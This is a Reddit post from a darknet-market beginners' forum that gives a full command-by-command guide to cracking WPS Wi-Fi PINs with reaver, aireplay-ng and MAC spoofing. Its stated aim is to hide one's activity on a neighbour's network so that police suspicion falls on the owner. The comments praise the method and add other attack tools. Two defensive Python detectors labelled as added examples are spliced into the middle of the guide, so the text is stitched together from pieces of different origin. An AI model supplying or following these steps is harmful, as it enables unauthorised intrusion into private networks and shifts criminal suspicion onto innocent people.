Guide to Cracking WPS WiFi using Reaver. (xpost /r/dnmnoobs)

For all of you out there looking to really step up your OpSec, here is a great way to do so. By piggybacking off of someone else's IP (and spoofing your MAC address) while using their internet, you are completely anonymous while browsing online. If for some reason your IP was leaked while using Tor, piggybacking off of someone's network would lead the investigation directly to them (who would be able to claim 100% ignorance).

I would also like to add that since making this guide someone pointed out to me that FrankenScript does the same thing without having to know all of the codes and technical details. However, I have not been able to successfully attack using it.

Using my methods below, I have cracked a few pins, with the average time taking about 14 - 15 hours.

Any comments, criticisms, and questions welcome.

DISCLAIMER: The information I'm providing in this tutorial could be used for illegal activity. Please only use this for lawful purposes (yeah right, like none of us break the law here) and I am in no way responsible if you are somehow caught breaking the law.

Lingo / basic terminal commands:

AP = Access point, the network we are trying to test

Ctrl + C = stop the running action in the terminal.

Now onto the fun.

If you were able to set up the following mostly on your own, this tutorial will be well within your skill set / fairly easy to learn:

Tails
PGP
Tor

You will need the following items to start this process:

Once you have all of that we can go through the process of burning the Kali ISO to a disc (or straight to a USB if you like). After installing from the disc, I booted into Kali and used the installer included with Kali to install it on my 16 GB USB drive. I then booted from my USB and made sure my USB wireless card was plugged in before booting (not required, but your wireless card might be called something different than mine). This is a guide for Reaver, so I'm not going into details of how to install Kali on a disc / DVD; it is almost exactly the same as Tails.

Kali Installation Guides:

Once booted into Kali we can start looking through the wireless activity around us.

Finding an AP to attack

Open a new terminal window and type the following command to list all of your wireless devices:

ifconfig

[Screenshot: command and output. I will be using "wlan0" for this tutorial.]

Identify your wireless card from the list above. Mine was wlan0; if yours is named something else, put it in place of mine for this tutorial.

Then put your wireless card into monitor mode with the command:

airmon-ng start wlan0

[Screenshot: command and output]

If any processes are found that could cause trouble you can kill them with the kill command (hitting enter after each line) like so:

kill 1028
kill 1174
kill 1419
kill 1418

[Screenshot: command and output]

For the kill lines, if you get two processes that are numbered one after the other (1418 & 1419), kill the higher numbered one first (1419); otherwise it will give you an error when trying to kill the second one.

Also please note your network card will change name when entering monitor mode. Mine is called "wlan0mon" now; yours will be something similar.

After getting this ready we can find a network to "test." Use the following command to list all networks around you that have a WPS-enabled router:

wash -i wlan0mon

[Screenshot: command and output]

This will list all of the vulnerable networks in your area (I have quite a few). Find a network with good power and make sure that the listing in the column that reads "WPS Locked" says "No". If it says "Yes" in that column, our attack will not work. Take note of the network's BSSID and channel number.

After identifying the AP we are testing, you can go ahead and press Ctrl + C to stop the scan. With the BSSID and channel number noted, we can get the info we need to perform our attack incognito.

Monitor just this network by using the command:

airodump-ng -c <ch #> --bssid <AP's bssid> wlan0mon

-c = channel number

--bssid = BSSID of target AP - you can use copy and paste to paste the BSSID in place

[Screenshot: command and output]

The lower set of numbers (BSSID and Station; we will refer to them as BSSID and AP Station from here on out) are the numbers we need for the rest of this attack. That lower line of info will only show up if a device is connected to the network's router. After getting this info you can go ahead and stop the function (Ctrl + C).

Now we will spoof our MAC for the attack. (This is optional but I do it to cover all my tracks)

Go ahead and stop your monitor mode using this command:

airmon-ng stop wlan0mon

[Screenshot: command and output]

Then use this command to take your wireless device offline so you can change the MAC (the interface name has dropped the "mon" because we took it out of monitor mode):

ifconfig wlan0 down

[Screenshot: command]

Then change the MAC address for it using the "macchanger" command:

macchanger -m <AP Station> wlan0

[Screenshot: command and output]

Then issue this command to bring the Wireless device back up:

ifconfig wlan0 up

[Screenshot: command]

Then we will start monitor mode on our wireless device again, because we need to be in monitor mode for the attack:

airmon-ng start wlan0

[Screenshot: command and output]

By running "ifconfig" on wlan0mon we can see that the MAC spoofing we just did on wlan0 did not carry over to our virtual wireless monitor device:

ifconfig wlan0mon

[Screenshot: command]

So we need to spoof our virtual monitor device's MAC now, same as before:

ifconfig wlan0mon down

[Screenshot: command]

Use the "macchanger" command again, using the "AP Station" from our target network as our new MAC (note: all MAC addresses must match when using the reaver attack, so if spoofed they all need to be the same):

macchanger -m <AP Station> wlan0mon

[Screenshot: command and output]

And then we are going to bring the monitor device back up:

ifconfig wlan0mon up

[Screenshot: command]
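From the defender's side, the spoofing described above leaves a trace: the real station and the copy share one address but not one frame counter, so the 802.11 sequence numbers seen for that MAC jump back and forth between two counters instead of ticking up by one. The detector below is an added example, not code from the original post or from any of the tools it uses. It runs over a constructed list of frame records (timestamp, transmitter MAC, sequence number) of the kind you would extract from an airodump-ng or tshark capture, and flags addresses whose sequence numbers behave like two transmitters. The field names, thresholds and sample addresses are this example's assumptions.

```python
"""Flag source MACs whose 802.11 sequence numbers look like two radios (added example)."""
from collections import defaultdict
from dataclasses import dataclass

SEQ_MOD = 4096       # the sequence number field in the 802.11 header is 12 bits
GAP_LIMIT = 200      # a forward step larger than this means the counter jumped or went backwards
MIN_ANOMALIES = 3    # how many bad steps one address must show before we report it


@dataclass(frozen=True)
class Frame:
    """One data frame as extracted from a capture (field names are this example's)."""
    ts: float   # capture time in seconds
    src: str    # transmitter address
    seq: int    # 12-bit sequence number


def seq_anomalies(frames):
    """Count, per source MAC, sequence steps that a single transmitter would not produce.

    A lone station increments by one per frame (with small gaps for frames we
    missed); retransmissions repeat a number, which we tolerate by only
    flagging steps larger than GAP_LIMIT. Two radios sharing one address give
    a stream that alternates between two counters, so most steps are large."""
    last = {}
    anomalies = defaultdict(int)
    for f in sorted(frames, key=lambda fr: fr.ts):
        prev = last.get(f.src)
        if prev is not None:
            delta = (f.seq - prev) % SEQ_MOD     # modular, so 4095 -> 0 is a step of 1
            if delta > GAP_LIMIT:
                anomalies[f.src] += 1
        last[f.src] = f.seq
    return dict(anomalies)


def suspected_impersonation(frames, min_anomalies=MIN_ANOMALIES):
    """Sorted list of addresses that exceeded the anomaly threshold."""
    return sorted(mac for mac, n in seq_anomalies(frames).items() if n >= min_anomalies)


def constructed_capture():
    """Sample frames built for this example; nothing here comes from a real network."""
    frames = []
    # ...01: a legitimate station (seq 100, 101, ...) interleaved with a second
    # radio using the same address (seq 3000, 3001, ...), the impersonation case.
    for i in range(5):
        frames.append(Frame(0.1 * i, "aa:bb:cc:dd:ee:01", 100 + i))
        frames.append(Frame(0.1 * i + 0.05, "aa:bb:cc:dd:ee:01", 3000 + i))
    # ...02: an honest station where we missed one frame (a gap of 2 is normal).
    for ts, seq in [(0.0, 500), (0.1, 501), (0.2, 503), (0.3, 504), (0.4, 505)]:
        frames.append(Frame(ts, "aa:bb:cc:dd:ee:02", seq))
    # ...03: an honest station whose counter wraps from 4095 to 0; must not be flagged.
    for ts, seq in [(0.0, 4094), (0.1, 4095), (0.2, 0), (0.3, 1)]:
        frames.append(Frame(ts, "aa:bb:cc:dd:ee:03", seq))
    return frames


SAMPLE_FRAMES = constructed_capture()

if __name__ == "__main__":
    print("anomaly counts:", seq_anomalies(SAMPLE_FRAMES))
    print("suspected impersonation:", suspected_impersonation(SAMPLE_FRAMES))
```

Kismet and similar wireless IDS tools implement this same heuristic; the point of the toy version is that the spoofed address only hides the attacker from a log that keys on MAC alone, not from anyone watching the frames themselves.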

Now that our MAC is spoofed, we are ready to begin our attack. In two separate terminal windows prepare the following commands:

reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A

Breakdown of what the options mean in reaver:

-c = channel # of the AP
-N = no NACKs
-d = delay after each pin attempt, in seconds
-S = dh-small (use small Diffie-Hellman keys)
-t = timeout, in seconds
-L = ignore locks reported by the AP
-r X:Y = recurring rest: every X pin attempts, rest for Y seconds
--mac= = spoof the MAC address the attack is coming from. THIS MUST MATCH THE MACs YOU SPOOFED EARLIER, known as <AP Station>
-vv = very verbose, gives you details about what is happening
-A = do not associate; tells reaver we will associate using another application

There are more options in reaver, use this command to get a full list:

reaver --help

The second command to prep in a new terminal window is:

aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon

Breakdown of options for "aireplay-ng":

-1 = fake authentication, re-associating every N seconds (i.e. re-associate every 60 seconds in my example)
-a = target BSSID
-h = MAC address the association is coming from (must be the same as the MACs we spoofed previously, AKA <AP Station>)

[Screenshot: command lines prepped for both reaver and aireplay-ng]

Before we start these we need to open another new terminal window and run "airodump-ng" to make sure the "aireplay-ng" command is looking for the AP on the correct channel:

airodump-ng -c <ch #> --bssid <BSSID> wlan0mon

[Screenshot: command and output]

Once we have that running (leave "airodump-ng" running in the background), run the "aireplay-ng" command we prepped previously:

aireplay-ng -1 60 -a <BSSID> -h <AP Station> wlan0mon

[Screenshot: output]

After an "Association successful :-)" message you can go ahead and stop the "airodump-ng" command (Ctrl + C):

[Screenshot: output]

Now that we are associated we can start the reaver attack. Go ahead and enter that command for reaver we prepped earlier:

reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -d 8 -S -L -t 10 -r 3:30 --mac=<AP Station> -vv -A

This is where things get dicey. If you have made it this far you have done most of the work, but each individual router is particular about the settings it needs to successfully accept a pin attempt over and over.

Here is a successfully entered pin:

[Screenshot: successful pin attempt]

There can be a lot of errors when trying to crack pins like this, and this method can take between 4 hours and 4 days. The first time I successfully cracked a pin it took me roughly 14 hours.

If you do run into errors, feel free to post them here and I will do my best to help, or (better bet) google the error and you will probably find a solution; that is how I did all of my troubleshooting.

If reaver keeps giving you errors, try different mixtures of delays and rest periods. Most routers don't like a source constantly trying pins and sending info like this, so small breaks in between sets of pin attempts help the router not freak out.
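The lockouts being worked around here (and mentioned in the comments: "WPS lockout after 3 attempts") are the AP's own defence, and from the AP or wireless-IDS side the attempt pattern is easy to spot as long as failures are counted per access point rather than per client MAC, since the client MAC is exactly what this tutorial spoofs. The code below is an added example, not the post's or reaver's: it parses constructed AP log lines in a made-up format, replays them through a lockout policy that locks after three consecutive failures and doubles the lock duration each time it triggers, and raises an alert once five failures land within ten minutes from any mix of source addresses. The log format, the thresholds and the escalating lock are all assumptions of this example.

```python
"""Monitor WPS PIN failures at the AP and model a lockout policy (added example)."""
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed log format for this example (not hostapd's or any vendor's real wording):
#   "<ISO timestamp> wps-auth <client MAC> <ok|fail>"
LOG_RE = re.compile(r"^(\S+) wps-auth ([0-9a-f]{2}(?::[0-9a-f]{2}){5}) (ok|fail)$")


def parse_wps_log(lines):
    """Return [(timestamp, mac, succeeded)] sorted by time; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3) == "ok"))
    return sorted(events)


class WpsLockout:
    """AP-side policy: after max_failures consecutive bad PINs, refuse WPS for a while.

    The lock duration doubles on each successive lock, so a brute force that
    paces itself around a fixed lockout still stalls for longer and longer."""

    def __init__(self, max_failures=3, lock_seconds=60):
        self.max_failures = max_failures
        self.base_lock = lock_seconds
        self.failures = 0          # consecutive failures since the last success or lock
        self.locks = 0             # how many times the AP has locked so far
        self.locked_until = None

    def attempt(self, ts, ok):
        """Classify one PIN attempt at time ts as 'locked', 'ok' or 'fail'."""
        if self.locked_until is not None and ts < self.locked_until:
            return "locked"
        if ok:
            self.failures = 0
            return "ok"
        self.failures += 1
        if self.failures >= self.max_failures:
            self.locks += 1
            self.locked_until = ts + timedelta(seconds=self.base_lock * 2 ** (self.locks - 1))
            self.failures = 0
        return "fail"


def run_policy(events, **kwargs):
    """Feed parsed events through a fresh WpsLockout; return (outcomes, number of locks)."""
    policy = WpsLockout(**kwargs)
    outcomes = [policy.attempt(ts, ok) for ts, _mac, ok in events]
    return outcomes, policy.locks


def brute_force_alerts(events, window_seconds=600, threshold=5):
    """Timestamps at which the failure count inside the window reaches the threshold.

    Failures are counted for the AP as a whole, not per client MAC, because a
    MAC-spoofing client can present a fresh address whenever it likes."""
    recent = deque()
    alerts = []
    for ts, _mac, ok in events:
        if ok:
            continue
        recent.append(ts)
        while (ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        if len(recent) == threshold:
            alerts.append(ts)
    return alerts


# Constructed sample log: one address fails three times and gets locked out, a second
# address then does the same, and the owner succeeds once the lock has expired.
SAMPLE_LOG = [
    "2015-03-02T01:00:00 wps-auth aa:bb:cc:dd:ee:01 fail",
    "2015-03-02T01:00:30 wps-auth aa:bb:cc:dd:ee:01 fail",
    "2015-03-02T01:01:00 wps-auth aa:bb:cc:dd:ee:01 fail",   # third failure: lock for 60 s
    "2015-03-02T01:01:30 wps-auth aa:bb:cc:dd:ee:01 fail",   # arrives during the lock
    "2015-03-02T01:02:30 wps-auth 02:00:00:00:00:99 fail",   # new address, lock has expired
    "2015-03-02T01:03:00 wps-auth 02:00:00:00:00:99 fail",
    "2015-03-02T01:03:30 wps-auth 02:00:00:00:00:99 fail",   # third failure again: lock for 120 s
    "2015-03-02T01:04:00 wps-auth 02:00:00:00:00:99 fail",   # arrives during the lock
    "2015-03-02T01:06:00 wps-auth 11:22:33:44:55:66 ok",     # owner, after the lock expired
    "this line is noise and does not parse",
]

if __name__ == "__main__":
    events = parse_wps_log(SAMPLE_LOG)
    outcomes, locks = run_policy(events)
    for (ts, mac, _ok), outcome in zip(events, outcomes):
        print(ts.time(), mac, outcome)
    print("locks triggered:", locks)
    print("alerts:", [t.isoformat() for t in brute_force_alerts(events)])
```

Run on the sample, the policy locks twice and the monitor fires once, at the fifth failure, even though that failure came from a different client address than the first four.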

When cracking a WPS network with MAC spoofing on like this, you will not get a password at the end of this cracking method. It will end and give you a WPS pin number (store this number!!). What you do with this is reset all of your MAC spoofing (unplug and plug back in your USB device) and then run the reaver attack again using the "-p" option with the pin number. So if reaver cracked the pin for you and it was "12345670", you would use this command (after resetting your MACs) to reveal the password:

reaver -i wlan0mon -b <bssid of target> -c <ch #> -N -L -d 8 -p 12345670 -vv -A

You also have to run the association application again while doing this:

aireplay-ng -1 60 -a <BSSID> wlan0mon

I forgot to take a screenshot the last time I cracked a WiFi, but here is what a fully completed reaver screen looks like with a password shown:

[Screenshot: completed run showing the pin and password]

The WPS PSK is the password to the network for when you want to log in.

The WPS pin is super useful: if the owner of the AP ever notices us stealing their interwebs and changes their password, we can run reaver with this pin again and it will instantly spit out the new password. So store these two pieces of info in a safe place.

Now we have the password, so all that is left is to boot into Tails, spoof all of our MAC addresses (this option can be found in "more options" at the start menu), and log into the freshly cracked network.

I think this covers most of the basics of using reaver. Please feel free to comment with any questions, criticisms, or tips. If someone is interested I can post a quick guide to booting FrankenScript and using it, but again I have had more success with this method.

Enjoy guys and fuck CISA!


Comments


[44 Points] None:

If you use Kali Linux, there is a GUI tool called Fern-Wifi-Cracker and it's literally all point and click. Wifite is an automated version of Reaver.

Kali runs on a livecd/usb just like TAILS, so it's easy to boot up, crack your neighbors password, and reboot into your regular install.

Edit: You can download Kali for free here. The wordlists (needed for Fern) are located in /usr/share/wordlists when you boot into it.


[18 Points] SolidSemen:

Thing is

the wifi i'm cracking has a WPS lockout after 3 attempts

rip


[17 Points] SlothropAnAbreaction:

Wow, thanks for the hard work, man, this is a great write up!


[9 Points] rebel101150:

Guide is appreciated but it's lost its uses in the past year or two. Many routers have built-in security functions to lock down the router for so long, and it will tell you it can't try any more pins due to WPS being locked. This just does not work anymore with a majority of them. I think I went around 5 years without paying for internet thanks to reaver and kali.


[9 Points] got_pwnt:

all this work....when cracking WPA2 is easier and quicker most of the time. learn to cloud crack, you're just gonna get locked out trying this shit. besides pixiewps is a better exploit.


[6 Points] kkkramer:

It's important to say that you should not do this to just your next door neighbor's house and expect any protection from the law. They will very quickly be able to connect the dots that grandma was not ordering drugs and maybe the nerdy guy next door hacked into her wireless. It's been done before.

You'd want to do some wardriving and find a good place to sit while you do your business if you truly want to be anonymous.


[7 Points] reddit_lurker242:

You do realize that Kali Linux does this with an automated program?

There is no point to following these instructions. I respect you for taking the time to write this though.


[5 Points] Sir_Blunt:

OP you're a noob. This technique is years old and hardly worked back then let alone now.


[4 Points] octomarvel:

Dude. You're doing god's work.

I wish I had 4 hands so I could give this 4 thumbs up.

=)


[2 Points] None:

Great tutorial, but if the fuzz would go so far as to question the owner of the wifi over an IP leak - what's stopping them from checking surrounding homes considering WiFi's short range?


[1 Points] Sniperman:

Awesome dude, I love cracking WEP and inputting all those cmds, and the output screen made me look like a 1337 hacker in front of my buddies. Def gonna give this a go, tysir.


[2 Points] druggieslut:

Come on, the majority of people here barely even know how to use a computer.


[2 Points] PhriskyDingough:

Did you guys know that if you super glue a thin piece of thread to a dolar bill and put it in a vending machine, you can buy a coke, and pull the dollar back out with the string? Seriously.... it's been the same scam since like 1975.


[2 Points] MO_Drugs:

so I read this:

If you were able to set up the following mostly on your own, this tutorial will be well within your skill sets / fairly easy to learn: Tails PGP Tor

and i says Kewl!

then i keep reading

and i says op is high.


[1 Points] JackJackSplat:

Very useful, Thanks.


[1 Points] None:

[deleted]


[1 Points] sapiophile:

Really nice guide, thanks a ton for posting this.

/u/changetip 8mbtc


[1 Points] None:

[deleted]


[1 Points] TotesMessenger:

I'm a bot, bleep, bloop. Someone has linked to this thread from another place on reddit:

If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads. (Info / Contact)


[1 Points] Bewgs:

Am I the only one here that sees no link or text in this post?


[1 Points] Luxtaposition:

So, this is cool. However, how can i strengthen my Wi-Fi security from the likes of my fellow Redditors?


[1 Points] steggun_cinargo:

I remember with backtrack 3 I could get into wps in 20 minutes or less. Backtrack 5 could get wpa and wpa2 overnight but then I ran into routers locking me out. Haven't needed to worry about it since so it's nice to see where things are these days.


[1 Points] None:

[deleted]


[1 Points] Clix828:

[deleted]

What is this?


[1 Points] deguppyusel:

I personally don't think it's "great" opsec to piggyback on a neighbor's wifi. Make sure your MAC address doesn't get logged while doing this; this could fuck you. Also, for the newbs out there who don't understand this whole post, there is an easier method you might try. It is certainly not how I go about cracking wifi, but check out AirPCAP Packet Injection adapters; they are able to be used with the GUI wifi hacking tool Cain & Abel.

AirPCAP TX Adapter

Cracking WEP/WPA with Cain and Abel with AirPcap


[1 Points] bigcamel44:

good write up. i think lifehacker had this posted a few years ago.


[1 Points] islandMarket:

There is a much better way using reaver which cracks the SHA in minutes. Pixiewps.


[1 Points] None:

I love Kali. I learned to do some cool stuff on Kali back in the day (like a year ago lol). Very nice guide :)


[1 Points] ASAP_Archi:

Is there any benefit to using a live boot or mounted OS? I'm just using a Virtual Machine and yeah it's slow but surely the constraint is not my computational power with this type of attack. Am I wrong?


[1 Points] The_Madhouse:

I highly recommend BackBox Linux over Kali


[-1 Points] None:

[deleted]


[-6 Points] verbify:

So, your neighbour's house or mail gets searched? Thanks a lot, asshole.